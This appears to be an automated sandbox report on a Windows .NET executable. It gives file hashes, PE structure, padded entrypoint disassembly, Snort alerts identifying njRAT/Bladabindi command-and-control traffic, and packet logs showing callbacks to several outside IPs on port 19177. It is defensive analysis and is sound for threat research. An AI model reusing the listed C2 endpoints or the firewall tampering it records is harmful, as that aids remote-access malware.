                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):313
                                                                      Entropy (8bit):4.971939296804078
                                                                      Encrypted:false
                                                                      SSDEEP:6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
                                                                      MD5:689E2126A85BF55121488295EE068FA1
                                                                      SHA1:09BAAA253A49D80C18326DFBCA106551EBF22DD6
                                                                      SHA-256:D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
                                                                      SHA-512:C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
                                                                      Malicious:false
                                                                      Preview:..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.998369385258011
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:KvS2rT08PQ.exe
                                                                      File size:2'447'360 bytes
                                                                      MD5:2784277bd68152abf75c6c6d59fab7af
                                                                      SHA1:e1d047c97e3bdfe273b215b42eccde32ca2ca63f
                                                                      SHA256:737bba8d3e9ad3e1526bf5949962af3b37107c80c767c473a820999eae507fbc
                                                                      SHA512:e05b8251c9f6c59c7901d72c58f5b8c35dc376068368e67f81ee79da4287ddfc25c6ca5893d87944ed21c592bdd62f57d40a9f78c9af56762f33b010dd10b62c
                                                                      SSDEEP:49152:T2Q8G4mSmM8sik/AJ+/GRfzlW+oCZBNKoiYNsVjGMFWm02qG6zSo2:T2VmT8B4JAGllW+DBNdtN811
                                                                      TLSH:4DB53310C5E80C26C80FC6FF8D6E729A416EC6CB4D263D3BCC943C95D5A626BA57D728
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...gb.f..................$...........$.. ....%...@.. ........................%...........@................................

                                                                      File Icon

                                                                      Icon Hash:a5212996d66b3b9c

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x64f4be
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x66106267 [Fri Apr 5 20:43:19 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x24f4680x53.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2500000x7dd8.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2580000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x24d4c40x24d600e4285a4b56f6f975a60c25f35c4e58f2unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x2500000x7dd80x7e0030c20d4fb1ed849582819809e0e1103dFalse0.9612165178571429data7.918456979217411IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x2580000xc0x200ea5adef9f74f3b92605254d2925f5f39False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0x2501300x7859PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.980947125839852
                                                                      RT_GROUP_ICON0x25798c0x14data0.9
                                                                      RT_VERSION0x2579a00x24cdata0.4744897959183674
                                                                      RT_MANIFEST0x257bec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      04/20/24-21:33:31.352663TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975019177192.168.2.43.125.209.94
                                                                      04/20/24-21:35:42.023350TCP2814860ETPRO TROJAN njRAT/Bladabindi CnC Callback (act)4975819177192.168.2.43.125.223.134
                                                                      04/20/24-21:35:32.786647TCP2814860ETPRO TROJAN njRAT/Bladabindi CnC Callback (act)4975719177192.168.2.43.125.223.134
                                                                      04/20/24-21:32:07.714188TCP2825564ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)4974019177192.168.2.418.158.249.75
                                                                      04/20/24-21:33:38.270894TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975119177192.168.2.43.125.209.94
                                                                      04/20/24-21:32:26.030819TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4974719177192.168.2.418.158.249.75
                                                                      04/20/24-21:34:13.358970TCP2825564ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)4975319177192.168.2.43.125.209.94
                                                                      04/20/24-21:32:02.183024TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4973719177192.168.2.418.158.249.75
                                                                      04/20/24-21:32:04.631394TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974019177192.168.2.418.158.249.75
                                                                      04/20/24-21:32:25.822297TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974719177192.168.2.418.158.249.75
                                                                      04/20/24-21:35:55.347737TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975919177192.168.2.43.124.142.205
                                                                      04/20/24-21:32:56.770839TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4974919177192.168.2.418.158.249.75
                                                                      04/20/24-21:33:38.479570TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4975119177192.168.2.43.125.209.94
                                                                      04/20/24-21:33:56.027448TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4975219177192.168.2.43.125.209.94
                                                                      04/20/24-21:35:55.555682TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4975919177192.168.2.43.124.142.205
                                                                      04/20/24-21:35:39.113591TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975819177192.168.2.43.125.223.134
                                                                      04/20/24-21:34:08.564113TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4975319177192.168.2.43.125.209.94
                                                                      04/20/24-21:32:04.839656TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4974019177192.168.2.418.158.249.75
                                                                      04/20/24-21:35:55.890076TCP2825564ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)4975919177192.168.2.43.124.142.205
                                                                      04/20/24-21:33:31.560459TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4975019177192.168.2.43.125.209.94
                                                                      04/20/24-21:36:07.123314TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4976019177192.168.2.43.124.142.205
                                                                      04/20/24-21:34:42.913707TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975419177192.168.2.43.125.223.134
                                                                      04/20/24-21:32:57.578337TCP2814860ETPRO TROJAN njRAT/Bladabindi CnC Callback (act)4974919177192.168.2.418.158.249.75
                                                                      04/20/24-21:35:20.785425TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975619177192.168.2.43.125.223.134
                                                                      04/20/24-21:35:17.370363TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975519177192.168.2.43.125.223.134
                                                                      04/20/24-21:35:27.123609TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975719177192.168.2.43.125.223.134
                                                                      04/20/24-21:35:55.890076TCP2814860ETPRO TROJAN njRAT/Bladabindi CnC Callback (act)4975919177192.168.2.43.124.142.205
                                                                      04/20/24-21:34:43.124036TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4975419177192.168.2.43.125.223.134
                                                                      04/20/24-21:36:06.912000TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4976019177192.168.2.43.124.142.205
                                                                      04/20/24-21:32:07.714188TCP2814860ETPRO TROJAN njRAT/Bladabindi CnC Callback (act)4974019177192.168.2.418.158.249.75
                                                                      04/20/24-21:35:17.579185TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4975519177192.168.2.43.125.223.134
                                                                      04/20/24-21:32:57.578337TCP2825564ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)4974919177192.168.2.418.158.249.75
                                                                      04/20/24-21:35:20.991740TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4975619177192.168.2.43.125.223.134
                                                                      04/20/24-21:35:42.023350TCP2825564ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)4975819177192.168.2.43.125.223.134
                                                                      04/20/24-21:32:02.391022TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4973719177192.168.2.418.158.249.75
                                                                      04/20/24-21:34:13.358970TCP2814860ETPRO TROJAN njRAT/Bladabindi CnC Callback (act)4975319177192.168.2.43.125.209.94
                                                                      04/20/24-21:35:27.332080TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4975719177192.168.2.43.125.223.134
                                                                      04/20/24-21:35:32.786647TCP2825564ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)4975719177192.168.2.43.125.223.134
                                                                      04/20/24-21:32:56.978717TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4974919177192.168.2.418.158.249.75
                                                                      04/20/24-21:33:55.819529TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975219177192.168.2.43.125.209.94
                                                                      04/20/24-21:34:08.350949TCP2033132ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll)4975319177192.168.2.43.125.209.94
                                                                      04/20/24-21:35:39.323225TCP2814856ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf)4975819177192.168.2.43.125.223.134

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 20, 2024 21:31:58.974719048 CEST49733443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:31:58.974764109 CEST44349733104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:31:58.974833012 CEST49733443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:31:58.979887009 CEST49733443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:31:58.979921103 CEST44349733104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:31:59.217201948 CEST44349733104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:31:59.217288971 CEST49733443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:31:59.220011950 CEST49733443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:31:59.220027924 CEST44349733104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:31:59.220383883 CEST44349733104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:31:59.263487101 CEST49733443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:31:59.307159901 CEST49733443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:31:59.352119923 CEST44349733104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:31:59.452532053 CEST44349733104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:31:59.453732014 CEST49733443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:31:59.453757048 CEST44349733104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:31:59.692411900 CEST4973480192.168.2.4208.95.112.1
                                                                      Apr 20, 2024 21:31:59.699196100 CEST44349733104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:31:59.699501038 CEST44349733104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:31:59.699564934 CEST49733443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:31:59.702600002 CEST49733443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:31:59.809977055 CEST8049734208.95.112.1192.168.2.4
                                                                      Apr 20, 2024 21:31:59.810075998 CEST4973480192.168.2.4208.95.112.1
                                                                      Apr 20, 2024 21:31:59.810339928 CEST4973480192.168.2.4208.95.112.1
                                                                      Apr 20, 2024 21:31:59.848525047 CEST49735443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:31:59.848582983 CEST44349735104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:31:59.848937988 CEST49735443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:31:59.849363089 CEST49735443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:31:59.849384069 CEST44349735104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:31:59.926877022 CEST8049734208.95.112.1192.168.2.4
                                                                      Apr 20, 2024 21:31:59.934222937 CEST4973480192.168.2.4208.95.112.1
                                                                      Apr 20, 2024 21:32:00.071748018 CEST44349735104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:32:00.073633909 CEST49735443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:32:00.073668003 CEST44349735104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:32:00.320820093 CEST44349735104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:32:00.321320057 CEST49735443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:32:00.321368933 CEST44349735104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:32:00.512598038 CEST44349735104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:32:00.512746096 CEST44349735104.26.0.5192.168.2.4
                                                                      Apr 20, 2024 21:32:00.512968063 CEST49735443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:32:00.513319969 CEST49735443192.168.2.4104.26.0.5
                                                                      Apr 20, 2024 21:32:01.878685951 CEST4973719177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:02.086950064 CEST191774973718.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:02.087109089 CEST4973719177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:02.183023930 CEST4973719177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:02.390958071 CEST191774973718.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:02.391021967 CEST4973719177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:02.408924103 CEST191774973718.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:02.408979893 CEST4973719177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:02.599055052 CEST191774973718.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:02.616897106 CEST191774973718.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:04.422049046 CEST4974019177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:04.630847931 CEST191774974018.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:04.630918980 CEST4974019177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:04.631393909 CEST4974019177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:04.839503050 CEST191774974018.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:04.839656115 CEST4974019177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:05.047847986 CEST191774974018.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:07.714188099 CEST4974019177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:07.922426939 CEST191774974018.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:23.154500008 CEST191774974018.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:23.154596090 CEST4974019177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:23.587166071 CEST191774974018.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:23.669764996 CEST4974019177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:25.607466936 CEST4974019177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:25.608818054 CEST4974719177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:25.817172050 CEST191774974718.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:25.817287922 CEST4974719177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:25.822297096 CEST4974719177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:26.030733109 CEST191774974718.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:26.030818939 CEST4974719177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:26.239140987 CEST191774974718.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:41.242646933 CEST191774974718.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:41.242769957 CEST4974719177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:54.553770065 CEST191774974718.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:54.555115938 CEST4974719177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:56.560832024 CEST4974719177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:56.562040091 CEST4974919177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:56.769295931 CEST191774974718.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:56.769803047 CEST191774974918.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:56.769889116 CEST4974919177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:56.770838976 CEST4974919177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:56.978626013 CEST191774974918.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:56.978717089 CEST4974919177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:57.186633110 CEST191774974918.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:32:57.578336954 CEST4974919177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:32:57.786218882 CEST191774974918.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:33:12.820600986 CEST191774974918.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:33:12.820708036 CEST4974919177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:33:28.034634113 CEST191774974918.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:33:28.034888983 CEST4974919177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:33:29.010786057 CEST191774974918.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:33:29.010864973 CEST4974919177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:33:31.013798952 CEST4974919177192.168.2.418.158.249.75
                                                                      Apr 20, 2024 21:33:31.143727064 CEST4975019177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:31.221728086 CEST191774974918.158.249.75192.168.2.4
                                                                      Apr 20, 2024 21:33:31.351506948 CEST19177497503.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:33:31.351610899 CEST4975019177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:31.352663040 CEST4975019177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:31.560309887 CEST19177497503.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:33:31.560458899 CEST4975019177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:31.768177032 CEST19177497503.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:33:35.918665886 CEST19177497503.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:33:35.918803930 CEST4975019177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:37.923912048 CEST4975019177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:37.932454109 CEST4975119177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:38.131932020 CEST19177497503.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:33:38.141277075 CEST19177497513.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:33:38.143198967 CEST4975119177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:38.270894051 CEST4975119177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:38.479424953 CEST19177497513.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:33:38.479569912 CEST4975119177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:38.688230038 CEST19177497513.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:33:53.589795113 CEST19177497513.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:33:53.810482979 CEST4975119177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:55.608493090 CEST4975119177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:55.609772921 CEST4975219177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:55.818470955 CEST19177497523.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:33:55.818583965 CEST4975219177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:55.819529057 CEST4975219177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:56.027160883 CEST19177497523.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:33:56.027447939 CEST4975219177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:33:56.235270977 CEST19177497523.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:06.137371063 CEST19177497523.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:06.137538910 CEST4975219177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:08.138751984 CEST4975219177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:08.140052080 CEST4975319177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:08.346503973 CEST19177497523.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:08.349991083 CEST19177497533.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:08.350090981 CEST4975319177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:08.350949049 CEST4975319177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:08.564006090 CEST19177497533.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:08.564112902 CEST4975319177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:08.774139881 CEST19177497533.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:13.358969927 CEST4975319177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:13.569068909 CEST19177497533.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:28.595856905 CEST19177497533.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:28.595948935 CEST4975319177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:40.586380959 CEST19177497533.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:40.591303110 CEST4975319177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:42.592190981 CEST4975319177192.168.2.43.125.209.94
                                                                      Apr 20, 2024 21:34:42.702027082 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:34:42.802095890 CEST19177497533.125.209.94192.168.2.4
                                                                      Apr 20, 2024 21:34:42.912415981 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:34:42.912643909 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:34:42.913707018 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:34:43.123955965 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:34:43.124036074 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:34:43.334415913 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:34:58.335804939 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:34:58.339273930 CEST4975419177192.168.2.43.125.223.134
